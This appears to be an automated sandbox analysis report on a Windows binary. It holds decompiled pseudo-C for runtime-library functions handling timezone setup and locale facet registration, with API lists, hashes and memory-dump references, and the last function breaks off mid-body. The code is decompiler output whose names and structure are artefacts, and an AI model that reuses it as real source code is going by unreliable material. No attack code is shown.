std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA19F

Strings

8k(n, xrefs: 6E1CA11B

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8k(n
API String ID: 1394824916-2802764134
Opcode ID: dc04cd98c20ff474064467ce398ead27a784c947ab179023beac6491670c6897
Instruction ID: 203d0ce524e9c409bb6d7ad40ed71b448bb87f6885a7f0cc4cbc50e4b1fc8aff
Opcode Fuzzy Hash: dc04cd98c20ff474064467ce398ead27a784c947ab179023beac6491670c6897
Instruction Fuzzy Hash: D81136759105188BCF02DBE8C844AFEB77AAF64B14F140808E011EB2D0DF78DD88E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E218951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E218951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E21822B();
				_t1 =  &_v8; // 0x6e232130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E218289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e28506c; // 0x3ec3ee36
					_v56 = _t38 ^ _t106;
					 *0x6e285384 =  *0x6e285384 | 0xffffffff;
					 *0x6e285378 =  *0x6e285378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e287a10 = 0;
					_t42 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e232130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E20F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e232130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E20CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E20CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E218951(0x6e232130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E21877C(0x6e232130, _t90, __eflags);
						}
					}
					E6E20CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E1DF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E218231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E21825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E20CBD3( *0x6e287a08);
							 *0x6e287a08 = 0;
							 *_t107 = 0x6e287a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e287a18 * 0x3c;
								_t88 =  *0x6e287a6c; // 0x0
								_push(__edi);
								 *0x6e287a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e287a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e287ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e287ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E203CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e287a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e287a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E218225()) = _v8;
							 *(E6E218219()) = _v12;
							_t61 = E6E21821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6e218951
0x6e218960
0x6e218964
0x6e218967
0x6e21896b
0x6e21896e
0x6e218971
0x6e218976
0x6e218979
0x6e218aa1
0x6e218aa1
0x6e218aa2
0x6e218aa3
0x6e218aa4
0x6e218aa5
0x6e218aa6
0x6e218aab
0x6e218aaf
0x6e218ab7
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad6
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afb
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5d
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b80
0x6e218b8b
0x6e21897f
0x6e218983
0x6e218988
0x6e21898b
0x00000000
0x6e218991
0x6e218995
0x6e21899a
0x6e21899d
0x00000000
0x6e2189a3
0x6e2189a9
0x6e2189ae
0x6e2189b4
0x6e2189c4
0x6e2189ca
0x6e2189d1
0x6e2189d7
0x6e2189db
0x6e2189e1
0x6e2189e4
0x6e2189eb
0x6e2189f2
0x6e2189f2
0x6e2189f5
0x6e2189fc
0x6e218a14
0x6e218a14
0x6e218a17
0x6e2189fe
0x6e2189fe
0x6e218a05
0x00000000
0x6e218a07
0x6e218a09
0x6e218a0f
0x6e218a0f
0x6e218a05
0x6e218a1f
0x6e218a3b
0x6e218a4b
0x6e218a42
0x6e218a44
0x6e218a44
0x6e218a69
0x6e218a7b
0x6e218a70
0x6e218a73
0x6e218a73
0x6e218a69
0x6e218a85
0x6e218a8f
0x6e218a94
0x6e218a99
0x6e218aa0
0x6e218aa0
0x6e21899d
0x6e21898b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E2189A9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218964, 6E21896A
0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!#n$0!#n
API String ID: 1286116820-3624508691
Opcode ID: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction ID: e372011220b55871f39097894fc21775425ffea736f2159fa9be8215c809bda3
Opcode Fuzzy Hash: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction Fuzzy Hash: F051B97190861EEFDB04DFE58CC49EAB7FFAB46354B10066AE621E7290D7309B44C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1CFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1D162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1D542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6e1cfc89
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcba
0x6e1cfcbf
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7

APIs

__EH_prolog3.LIBCMT ref: 6E1CFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFC9A
int.LIBCPMT ref: 6E1CFCB1

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFD29

Strings

`m(n, xrefs: 6E1CFCA5

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `m(n
API String ID: 651022567-2906296985
Opcode ID: 2304da67fb916cdd08fd64f2ec2af778190930b1cd5f8672c9260534838d3a24
Instruction ID: b592d4e4f577ea2be97231f66722a7ffe644ee2aabb88268f3db0a42384b1074
Opcode Fuzzy Hash: 2304da67fb916cdd08fd64f2ec2af778190930b1cd5f8672c9260534838d3a24
Instruction Fuzzy Hash: 7A1136759105288BCF01EBE4C854AFEB37ABFA5B14F240808E420E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t594 - 0x14, 0);
				_t567 =  *0x6e286dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1A161C(0x6e286d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E1C66BA(_t594 - 0x14);
					return E6E1E0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E1D10BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t594 - 0x20);
							E6E1E3D74(_t594 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t553, _t567, 0x14);
							E6E1C6653(_t594 - 0x14, 0);
							_t568 =  *0x6e286df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1A161C(0x6e286da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E1C66BA(_t594 - 0x14);
								return E6E1E0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E1D1127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t594 - 0x20);
										E6E1E3D74(_t594 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t420, _t554, _t568, 0x14);
										E6E1C6653(_t594 - 0x14, 0);
										_t569 =  *0x6e286df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1A161C(0x6e286da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E1C66BA(_t594 - 0x14);
											return E6E1E0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E1D11AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t594 - 0x20);
													E6E1E3D74(_t594 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t420, _t555, _t569, 0x14);
													E6E1C6653(_t594 - 0x14, 0);
													_t570 =  *0x6e286dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1A161C(0x6e286d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E1C66BA(_t594 - 0x14);
														return E6E1E0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E1D1230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t594 - 0x20);
																E6E1E3D74(_t594 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t420, _t556, _t570, 0x14);
																E6E1C6653(_t594 - 0x14, 0);
																_t571 =  *0x6e286dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1A161C(0x6e286d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E1C66BA(_t594 - 0x14);
																	return E6E1E0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E1D12B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t594 - 0x20);
																			E6E1E3D74(_t594 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t420, _t557, _t571, 0x14);
																			E6E1C6653(_t594 - 0x14, 0);
																			_t572 =  *0x6e286dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1A161C(0x6e286d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E1C66BA(_t594 - 0x14);
																				return E6E1E0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E1D1339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t594 - 0x20);
																						E6E1E3D74(_t594 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t420, _t558, _t572, 0x14);
																						E6E1C6653(_t594 - 0x14, 0);
																						_t573 =  *0x6e286db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1A161C(0x6e286d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E1C66BA(_t594 - 0x14);
																							return E6E1E0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E1D13A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t594 - 0x20);
																									E6E1E3D74(_t594 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t420, _t559, _t573, 0x14);
																									E6E1C6653(_t594 - 0x14, 0);
																									_t574 =  *0x6e286ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1A161C(0x6e286d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E1C66BA(_t594 - 0x14);
																										return E6E1E0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E1D1409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t594 - 0x20);
																												E6E1E3D74(_t594 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t420, _t560, _t574, 0x14);
																												E6E1C6653(_t594 - 0x14, 0);
																												_t575 =  *0x6e286de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1A161C(0x6e286d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E1C66BA(_t594 - 0x14);
																													return E6E1E0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E1D1471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t594 - 0x20);
																															E6E1E3D74(_t594 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t420, _t561, _t575, 0x14);
																															E6E1C6653(_t594 - 0x14, 0);
																															_t576 =  *0x6e286dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1A161C(0x6e286da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E1C66BA(_t594 - 0x14);
																																return E6E1E0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E1D14EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t594 - 0x20);
																																		E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t420, _t562, _t576, 0x14);
																																		E6E1C6653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e286dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1A161C(0x6e286d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E1C66BA(_t594 - 0x14);
																																			return E6E1E0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E1D1558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t594 - 0x20);
																																					E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t420, _t563, _t577, 0x14);
																																					E6E1C6653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e286e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1A161C(0x6e286dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E1C66BA(_t594 - 0x14);
																																						return E6E1E0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E1D15C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t594 - 0x20);
																																								E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t420, _t564, _t578, 0x14);
																																								E6E1C6653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e286dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1A161C(0x6e286d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E1C66BA(_t594 - 0x14);
																																									return E6E1E0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E1D162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1A1438(_t511);
																																											E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e22851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e22c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E1D542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E1E0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t565);
																																											 *0x6e22a26c();
